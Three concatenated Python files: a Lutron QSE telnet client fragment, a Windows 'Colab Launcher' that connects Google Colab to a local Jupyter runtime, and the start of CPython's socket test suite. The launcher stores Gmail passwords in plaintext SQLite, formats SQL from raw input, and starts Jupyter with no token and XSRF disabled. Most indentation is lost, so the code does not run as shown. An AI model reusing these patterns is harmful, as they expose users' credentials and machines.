if d.integration_id == id_string]
if devices_with_id:
assert len(devices_with_id) == 1
# pylint: disable=protected-access
devices_with_id[0]._handle_response(response)
return
_LOG.debug('Event for unknown device: ' + str(response))
def _make_device_request(self, serial_number, action, value=None):
"""Change the state of a device."""
cmd_parts = [_OP_COMMAND + _CMD_DEVICE,
serial_number, _DEFAULT_COMPONENT, action]
if value:
cmd_parts.append(value)
cmd = _command_from_parts(cmd_parts)
        result = self._lock_and_do_if_connected(self._exec, cmd) or []  # returns None when not connected
for response in result:
assert isinstance(response, list), response
assert response, response
if response[0] == _OP_RESPONSE + _CMD_DEVICE:
self._route_device_response(response)
def _exec(self, cmd):
"""Issue a command and parse the response.
Caller must hold _telnet_lock.
"""
self._flush()
if not self._telnet:
return []
self._write(cmd)
if not self._telnet:
return []
result = self._read_until_prompt()
return result
def _flush(self):
"""Flush unread data.
Caller must hold _telnet_lock.
"""
try:
while True:
data = self._telnet.read_eager()
if not data:
break
except (socket.error, EOFError):
_LOG.error('Connection to Lutron QSE lost.')
self._close()
def _write(self, data):
"""Write data to telnet.
Caller must hold _telnet_lock.
"""
try:
self._telnet.write(data)
except (socket.error, EOFError):
_LOG.error('Connection to Lutron QSE lost.')
self._close()
return
except socket.timeout:
_LOG.error('Timeout while attempting to write to Lutron QSE.')
return
_LOG.debug('Wrote: ' + str(data))
def _read_until_prompt(self, initial_data=None):
"""Read until we encounter a prompt and no additional data available.
Blocks until data is available (or timeout expires).
Caller must hold _telnet_lock.
"""
data = bytearray(initial_data) if initial_data else bytearray()
try:
# Read until we encounter a prompt and no additional data.
while not data.endswith(_PROMPT):
data.extend(self._telnet.read_until(_PROMPT, timeout=_TIMEOUT))
data.extend(self._telnet.read_eager())
if not data:
break
except (socket.error, EOFError):
_LOG.error('Connection to Lutron QSE lost')
self._close()
return []
except socket.timeout:
pass
        # Parse the data into responses and comma-delimited chunks.
result = []
responses = data.split(_EOL)
for response in responses:
response = response.replace(_PROMPT, b'')
if not response:
continue
result.append([bytes(b) for b in response.split(_DELIMITER)])
_LOG.debug('Read: ' + str(result))
return result
def _read_if_available(self):
"""Read data if available.
Caller must hold _telnet_lock.
"""
try:
data = self._telnet.read_eager()
except (socket.error, EOFError):
_LOG.error('Connection to Lutron QSE lost')
self._close()
return []
if not data:
return []
return self._read_until_prompt(initial_data=data)
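# Minimal usage sketch (the hostname below is illustrative; requires a
# reachable QSE-CI-NWK-E on the network):
if __name__ == '__main__':
    qse = QSE(hostname='192.168.1.50')
    if qse.connected():
        for roller in qse.rollers():
            print(roller.integration_id)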
|
Colab_Launcher.py
|
import os
import sys
import threading
import time
import traceback
import platform
import subprocess
import sqlite3
import requests
from helium._impl import selenium_wrappers
from pyautogui import KEYBOARD_KEYS
from rich import pretty
import pyinspect as pi
pi.install_traceback(hide_locals=True,relevant_only=True,enable_prompt=True)
pretty.install()
cf_icon_file_path = "Cloint-ICON.ico"
cursr = ""
connct = ""
email = ""
passwd= ""
url = 'https://raw.githubusercontent.com/ClointFusion/ClointFusion/master/requirements.txt'
FIRST_TIME = False
current_working_dir = os.path.dirname(os.path.realpath(__file__)) #get cwd
os.chdir(current_working_dir)
try:
os.system("{} -m pip install --upgrade pip".format(sys.executable))
except Exception as ex:
print("Error updating PIP = " + str(ex) )
requirements_page = requests.get(url)
req_pkg_lst = str(requirements_page.text).splitlines()
req_pkg_lst = list(map(lambda s: s.strip(), req_pkg_lst))
def db_create_database_connect():
"""
Function to create a database and connect to it
"""
global cursr
global connct
try:
# connct = sqlite3.connect('{}.db'.format(database_name))
connct = sqlite3.connect(r'{}\{}.db'.format(current_working_dir,"ClointFusion_DB"))
cursr = connct.cursor()
# print('Created & Connected with Database \'{}\''.format("ClointFusion_DB"))
except Exception as ex:
print("Error in db_create_database_connect="+str(ex))
def db_create_table():
global cursr
global connct
try:
table_name = 'My_Table'
table_dict={'email': 'TEXT', 'passwd': 'TEXT'}
table = str(table_dict).replace("{","").replace("'","").replace(":","").replace("}","")
# table = table.replace('INT,','INT PRIMARY KEY,',1) #make first field as PK
exec_query = "CREATE TABLE IF NOT EXISTS {}({});".format(table_name,table)
cursr.execute("""{}""".format(exec_query))
connct.commit()
# print('Table \'{}\' created'.format(table_name))
except Exception as ex:
print("Error in db_create_table="+str(ex))
def db_check_record():
global cursr
global connct
global email, passwd
table_name = 'My_Table'
exec_query = "SELECT * FROM {};".format(table_name)
cursr.execute(exec_query)
all_results = cursr.fetchall()
if all_results:
email = all_results[0][0]
passwd = all_results[0][1]
return all_results
def db_insert_rows(email, passwd):
global cursr
global connct
table_name = 'My_Table'
table_dict = {'email':email,'passwd':passwd}
table_keys = str(table_dict.keys()).replace('dict_keys([',"").replace("'","").replace("])","")
table_values = str(table_dict.values()).replace('dict_values([',"").replace("])","")
exec_query = "INSERT INTO {}({}) VALUES({});".format(table_name,table_keys,table_values)
cursr.execute("""{}""".format(exec_query))
connct.commit()
# print("Row with values {} inserted into \'{}\'".format(table_values,table_name))
def _load_missing_python_packages_windows(list_of_required_packages_1=[]):
"""
Installs Windows OS specific python packages
"""
try:
list_of_required_packages = [x.strip().lower() for x in list_of_required_packages_1]
reqs = subprocess.check_output([sys.executable, '-m', 'pip', 'list'])
installed_packages = [str(r.decode().split('==')[0]).strip().lower() for r in reqs.split()]
        missing_packages = list(set(list_of_required_packages) - set(installed_packages))
        if missing_packages:
            print("{} package(s) are missing".format(' '.join(missing_packages)))
            if "comtypes" in missing_packages:
                os.system("{} -m pip install comtypes==1.1.7".format(sys.executable))
            for pkg in missing_packages:  # one pip install per missing package name
                pkg_with_version = list(filter(lambda a: pkg in a, req_pkg_lst))
                # print(pkg_with_version)
                cmd = "pip install {}".format(pkg_with_version[0] if pkg_with_version else pkg)
                # print(cmd)
                os.system(cmd)
except Exception as ex:
print("Error in _load_missing_python_packages_windows="+str(ex))
try:
import pyautogui as pg
except Exception as ex:
_load_missing_python_packages_windows(['pyautogui'])
import pyautogui as pg
os_name = str(platform.system()).lower()
if os_name != 'windows':
pg.alert("Colab Launcher works only on windows OS as of now")
exit(0)
try:
import psutil
except:
_load_missing_python_packages_windows(["psutil"])
import psutil
def is_chrome_open():
try:
for proc in psutil.process_iter(['pid', 'name']):
# This will check if there exists any process running with executable name
if proc.info['name'] == 'chrome.exe':
yes_no=pg.confirm(text='Chrome browser needs to be closed !\n\nPlease click "Yes" to forcefully close it', title="ClointFusion's Colab Launcher", buttons=['Yes', 'No'])
if yes_no == 'Yes':
try:
subprocess.call("TASKKILL /f /IM CHROME.EXE",stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)
except:
pass
try:
subprocess.call("TASKKILL /f /IM CHROMEDRIVER.EXE",stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)
except:
pass
return False
else:
return True
except Exception as ex:
pg.alert("Error while closing chrome")
exc_type, exc_value, exc_tb = sys.exc_info()
pg.alert(traceback.format_exception(exc_type, exc_value, exc_tb,limit=None, chain=True))
exit(0)
if is_chrome_open()==True:
pg.alert("Please close Google Chrome browser & try again")
exit(0)
# try:
# os.system("pip install -r {}".format(requirements_path))
# except Exception as ex:
try:
_load_missing_python_packages_windows(['setuptools ','wheel', 'watchdog','Pillow','pynput','pif','PyAutoGUI ','PySimpleGUI ','bs4','clipboard','emoji','folium ','helium','imutils','kaleido','keyboard','matplotlib','numpy','opencv-python','openpyxl','pandas','plotly','requests','selenium','texthero','wordcloud','zipcodes','pathlib3x','pathlib','PyQt5','email-validator','testresources','scikit-image ','pivottablejs','ipython ','comtypes','cryptocode','ImageHash','get-mac','xlsx2html ','simplegmail','xlwings ','jupyterlab','notebook','Pygments','psutil','gspread'])
except Exception as ex:
pg.alert("Error while executing pip install -r requirements.txt")
exc_type, exc_value, exc_tb = sys.exc_info()
pg.alert(traceback.format_exception(exc_type, exc_value, exc_tb,limit=None, chain=True))
# finally:
# import ClointFusion_Lite as cfl
try:
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
import helium as browser
except:
_load_missing_python_packages_windows(['selenium','helium'])
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
import helium as browser
from webdriver_manager.chrome import ChromeDriverManager
# try:
# import ClointFusion
# except Exception as ex:
# try:
# # os.system("pip install ClointFusion")
# _load_missing_python_packages_windows(['clointfusion'])
# except:
# pg.alert("Error while executing pip install ClointFusion")
# exc_type, exc_value, exc_tb = sys.exc_info()
# pg.alert(traceback.format_exception(exc_type, exc_value, exc_tb,limit=None, chain=True))
# sys.exit(0)
try:
# import keyboard as kb
import PySimpleGUI as sg
import pygetwindow as gw
sg.theme('Dark') # for PySimpleGUI FRONT END
except:
# _load_missing_python_packages_windows(['keyboard','PySimpleGUI','PyGetWindow'])
_load_missing_python_packages_windows(['PySimpleGUI','PyGetWindow'])
# import keyboard as kb
import PySimpleGUI as sg
import pygetwindow as gw
sg.theme('Dark') # for PySimpleGUI FRONT END
def launch_jupyter():
try:
cmd = "pip install --upgrade jupyter_http_over_ws>=0.0.8 && jupyter serverextension enable --py jupyter_http_over_ws"
# subprocess.call(cmd,stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)
os.system(cmd)
cmd = 'jupyter notebook --no-browser --allow-root --NotebookApp.allow_origin="https://colab.research.google.com" --NotebookApp.token="" --NotebookApp.disable_check_xsrf=True'
# subprocess.call(cmd,stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)
os.system(cmd)
except:
print("Error in launch_jupyter")
pg.alert("Error in launch_jupyter")
        # Port 8888 may be busy; kill whatever process is listening on it (jupyter's default port)
        try:
            for _conn in psutil.net_connections(kind='tcp'):
                if _conn.laddr and _conn.laddr.port == 8888 and _conn.pid:
                    psutil.Process(_conn.pid).kill()
cmd = "pip install --upgrade jupyter_http_over_ws>=0.0.7 && jupyter serverextension enable --py jupyter_http_over_ws"
os.system(cmd)
cmd = 'jupyter notebook --no-browser --allow-root --NotebookApp.allow_origin="https://colab.research.google.com" --NotebookApp.token="" --NotebookApp.disable_check_xsrf=True'
# 'jupyter notebook --NotebookApp.allow_origin='https://colab.research.google.com' --NotebookApp.port_retries=0 --notebook-dir="" --no-browser --allow-root --NotebookApp.token='' --NotebookApp.disable_check_xsrf=True --port=8888
os.system(cmd)
except Exception as ex:
print("Port is busy = "+str(ex))
db_create_database_connect()
db_create_table()
def get_email_password_from_user():
global FIRST_TIME
try:
layout = [[sg.Text("ClointFusion - Set Yourself Free for Better Work", font='Courier 16', text_color='orange')],
[sg.Text(text='Please enter Gmail ID:',font=('Courier 12'),text_color='yellow'),sg.Input(key='-GMAIL-', justification='c',focus=True)],
[sg.Text(text='Please enter Password:',font=('Courier 12'),text_color='yellow'),sg.Input(key='-PASSWD-', justification='c',password_char='*')],
[sg.Submit('OK',button_color=('white','green'),bind_return_key=True, focus=True),sg.CloseButton('Cancel',button_color=('white','firebrick'))],
[sg.Text("These credentials will be stored on you local computer, used to automatically login & will be associated with Colab Launcher")]]
window = sg.Window('ClointFusion - Colab Launcher',layout, return_keyboard_events=True,use_default_focus=False,disable_close=False,element_justification='c',keep_on_top=True, finalize=True,icon=cf_icon_file_path)
while True:
event, values = window.read()
if event is None or event == 'Cancel' or event == "Escape:27":
values = []
# break
sys.exit(0)
if event == 'OK':
if values and values['-GMAIL-'] and values['-PASSWD-']:
db_insert_rows(values['-GMAIL-'],values['-PASSWD-'])
FIRST_TIME = True
break
else:
pg.alert("Please enter all the values")
window.close()
except Exception as ex:
print("Error in get_colab_url_from_user="+str(ex))
def db_delete_data():
global cursr
cursr.execute("""{}""".format("DELETE FROM 'My_Table' WHERE email='mayur@cloint.com'"))
all_results = cursr.fetchall()
print(all_results)
# db_delete_data()
if not db_check_record():
get_email_password_from_user()
def get_colab_url_from_user():
ret_val = "cancelled"
try:
dropdown_list = ["ClointFusion Labs (Public)", "ClointFusion Starter (Hackathon)"] #"ClointFusion Lite (Interns Only)"
oldKey = "Please choose desired Colab :"
# oldValue = "https://colab.research.google.com/github/ClointFusion/ClointFusion/blob/master/ClointFusion_Labs.ipynb"
oldValue = 'ClointFusion Labs (Public)'
layout = [[sg.Text("ClointFusion - Set Yourself Free for Better Work", font='Courier 16', text_color='orange')],
[sg.Text(text=oldKey,font=('Courier 12'),text_color='yellow'),sg.Listbox(dropdown_list,size=(30, 5),key='user_choice',default_values=oldValue,enable_events=True,change_submits=True)],#oluser_choice
[sg.Submit('OK',button_color=('white','green'),bind_return_key=True, focus=True),sg.CloseButton('Cancel',button_color=('white','firebrick'))],
[sg.Text("This is an automated tool which connects ClointFusion Colab with your Local Runtime.\nSign-in using your Gmail ID & wait for setup to Finish..")]]
window = sg.Window('ClointFusion - Colab Launcher',layout, return_keyboard_events=True,use_default_focus=False,disable_close=False,element_justification='c',keep_on_top=True, finalize=True,icon=cf_icon_file_path)
while True:
event, values = window.read()
if event is None or event == 'Cancel' or event == "Escape:27":
values = []
break
if event == 'OK':
if values and values['user_choice']:
ret_val = str(values['user_choice'][0])
break
else:
pg.alert("Please enter all the values")
window.close()
except Exception as ex:
print("Error in get_colab_url_from_user="+str(ex))
finally:
return ret_val
def modify_file_as_text(text_file_path, text_to_search, replacement_text):
import fileinput
with fileinput.FileInput(text_file_path, inplace=True, backup='.bak') as file:
for line in file:
print(line.replace(text_to_search, replacement_text), end='')
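# Usage sketch: rewrite Chrome's Preferences file in place so the browser
# starts without the "restore pages?" crash bubble (as done below in
# connect_to_local_runtime; prefs_path is illustrative):
#
#   modify_file_as_text(prefs_path, 'crashed', 'false')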
def connect_to_local_runtime(user_choice):
try:
# import chromedriver_binary
if user_choice == "ClointFusion Labs (Public)":
colab_url = "https://accounts.google.com/signin/v2/identifier?authuser=0&hl=en&continue=https://colab.research.google.com/github/ClointFusion/ClointFusion/blob/master/ClointFusion_Labs.ipynb" #https://colab.research.google.com/github/ClointFusion/ClointFusion/blob/master/ClointFusion_Labs.ipynb"
# colab_url = "https://colab.research.google.com/github/ClointFusion/ClointFusion/blob/master/ClointFusion_Labs.ipynb"
# elif user_choice == "ClointFusion Lite (Interns Only)":
# #Extract encrypted version of ClointFusion_Lite to a specific folder and in Colab import that folder
# colab_url = 'https://accounts.google.com/signin/v2/identifier?authuser=0&hl=en&continue=https://colab.research.google.com/drive/11MvoQfNFXJqlXKcXV1LBVUE98Ks48M_a'
elif user_choice == "ClointFusion Starter (Hackathon)":
colab_url = 'https://accounts.google.com/signin/v2/identifier?authuser=0&hl=en&continue=https://colab.research.google.com/drive/1G9mh58z8AbWqBit2TC4Wgg6p_eHPvUJB'
user_data_path = "C:\\Users\\{}\\AppData\\Local\\Google\\Chrome\\User Data".format(os.getlogin())
modify_file_as_text(user_data_path + '\\Default\\Preferences', 'crashed', 'false')
options = Options()
options.add_argument("--start-maximized")
options.add_experimental_option('excludeSwitches', ['enable-logging'])
if os_name == "windows":
options.add_argument("user-data-dir=C:\\Users\\{}\\AppData\\Local\\Google\\Chrome\\User Data".format(os.getlogin()))
elif os_name == "darwin":
options.add_argument("user-data-dir=/Users/{}/Library/Application/Support/Google/Chrome/User Data".format(os.getlogin()))
options.add_argument(f"profile-directory=Default")
browser_driver = webdriver.Chrome(ChromeDriverManager().install(), options=options)
browser.set_driver(browser_driver)
browser.go_to(colab_url)
chrome = gw.getWindowsWithTitle('Google Chrome')[0]
chrome.activate()
# pg.doubleClick(pg.size()[0]/2,pg.size()[1]/2)
# kb.press_and_release('esc')
# kb.press_and_release('esc')
try:
browser.wait_until(browser.Text("Code").exists,timeout_secs=6)
        except Exception:  # e.g. selenium_wrappers.common.exceptions.TimeoutException when not signed in yet
try:
browser.click(email)
except:
browser.write(email, into='Email or phone')
browser.click('Next')
time.sleep(0.5)
browser.write(passwd, into='Enter your password')
browser.click('Next')
time.sleep(0.5)
browser.wait_until(browser.Text("Code").exists,timeout_secs=240)
# kb.press_and_release('esc')
# time.sleep(0.2)
# pg.press(ESCAPE)
# time.sleep(0.2)
# press(ESCAPE)
# time.sleep(0.2)
if FIRST_TIME:
#create short-cut
browser.press(browser.CONTROL + 'mh')
time.sleep(1)
v = S("//input[@id='pref_shortcut_connectLocal']")
browser.write('',v)
browser.press(browser.CONTROL + '1')
time.sleep(0.5)
browser.click("SAVE")
time.sleep(1)
#use short-cut
browser.press(browser.CONTROL + '1')
time.sleep(1)
# pg.alert("HKHR")
pg.doubleClick(pg.size()[0]/2,pg.size()[1]/2)
time.sleep(1)
if FIRST_TIME:
# kb.press_and_release('SHIFT+TAB')
pg.hotkey('SHIFT', 'TAB')
time.sleep(0.5)
# kb.press_and_release('SHIFT+TAB')
pg.hotkey('SHIFT', 'TAB')
time.sleep(0.5)
# kb.press_and_release('SHIFT+TAB')
pg.hotkey('SHIFT', 'TAB')
time.sleep(0.5)
pg.write("http://localhost:8888")
# kb.write("http://localhost:8888")
time.sleep(2)
# click("CONNECT")
# kb.press_and_release('TAB')
pg.hotkey('TAB')
time.sleep(0.5)
# pg.alert(1)
# kb.press_and_release('TAB')
pg.hotkey('TAB')
time.sleep(0.5)
# pg.alert(2)
else:
# kb.press_and_release('SHIFT+TAB')
pg.hotkey('SHIFT', 'TAB')
time.sleep(0.5)
browser.press(browser.ENTER)
time.sleep(2)
# try:
# img = "Restore_Bubble.PNG"
# pos = pg.locateOnScreen(img, confidence=0.8) #region=
# pg.alert(pos)
# pg.click(*pos)
# except:
# pass
pg.alert("Ready ! Google Colab is now connected with your Local Runtime.\n\nPlease click 'OK' & you are all set to work on ClointFusion Colabs...")
except Exception as ex:
print("Error in connect_to_local_runtime="+str(ex))
exc_type, exc_value, exc_tb = sys.exc_info()
pg.alert(traceback.format_exception(exc_type, exc_value, exc_tb,limit=None, chain=True))
pg.alert("Error in connect_to_local_runtime="+str(ex))
        # connect_to_local_runtime()
# def popup_msg():
# sg.PopupTimed("Loading... Please wait", auto_close=30)
if __name__ == "__main__":
try:
user_choice = get_colab_url_from_user()
if user_choice != "cancelled":
# creating threads
t1 = threading.Thread(target=connect_to_local_runtime,args=(user_choice,))
t2 = threading.Thread(target=launch_jupyter)
# t3 = threading.Thread(target=popup_msg)
t1.start()
t2.start()
# t3.start()
t1.join()
t2.join()
# t3.join()
else:
print("User Cancelled the Launch")
except Exception as ex:
pg.alert("Error in Main="+str(ex))
exc_type, exc_value, exc_tb = sys.exc_info()
pg.alert(traceback.format_exception(exc_type, exc_value, exc_tb,limit=None, chain=True))
print("Error in Main="+str(ex))
|
test_socket.py
|
import unittest
from test import support
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import shutil
import string
import _thread as thread
import threading
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = support.HOST
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8')  # test unicode string and carriage return
MAIN_TIMEOUT = 60.0
VSOCKPORT = 1234
try:
import _socket
except ImportError:
_socket = None
def get_cid():
if fcntl is None:
return None
try:
with open("/dev/vsock", "rb") as f:
            r = fcntl.ioctl(f, socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID, "    ")  # 4-byte result buffer
except OSError:
return None
else:
return struct.unpack("I", r)[0]
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_isotp():
"""Check whether CAN ISOTP sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_alg():
"""Check whether AF_ALG sockets are supported on this host."""
try:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_vsock():
"""Check whether AF_VSOCK sockets are supported on this host."""
    return get_cid() is not None
def _is_fd_in_blocking_mode(sock):
return not bool(
fcntl.fcntl(sock, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_CAN_ISOTP = _have_socket_can_isotp()
HAVE_SOCKET_RDS = _have_socket_rds()
HAVE_SOCKET_ALG = _have_socket_alg()
HAVE_SOCKET_VSOCK = _have_socket_vsock()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = support.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ifconfig vcan0 up
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
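    # For illustration: a frame with CAN ID 0x123 carrying b'\x01\x02' packs as
    #   struct.pack(can_frame_fmt, 0x123, 2, b'\x01\x02'.ljust(8, b'\x00'))
    # (data padded to 8 bytes, as CANTest.build_can_frame() does below),
    # giving exactly can_frame_size == 16 bytes.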
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
`struct can_frame` definition). Must use native not standard types for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = support.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
    connection and performing the accept() in setUp()).
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.wait_threads = support.wait_threads_exit()
self.wait_threads.__enter__()
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
self.wait_threads.__exit__(None, None, None)
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
try:
self.clientSetUp()
except BaseException as e:
self.queue.put(e)
self.clientTearDown()
return
finally:
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
@unittest.skipUnless(get_cid() != 2,
"This test can only be run on a virtual guest.")
class ThreadedVSOCKSocketStreamTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.serv.close)
self.serv.bind((socket.VMADDR_CID_ANY, VSOCKPORT))
self.serv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.serv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
time.sleep(0.1)
self.cli = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
cid = get_cid()
self.cli.connect((cid, VSOCKPORT))
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
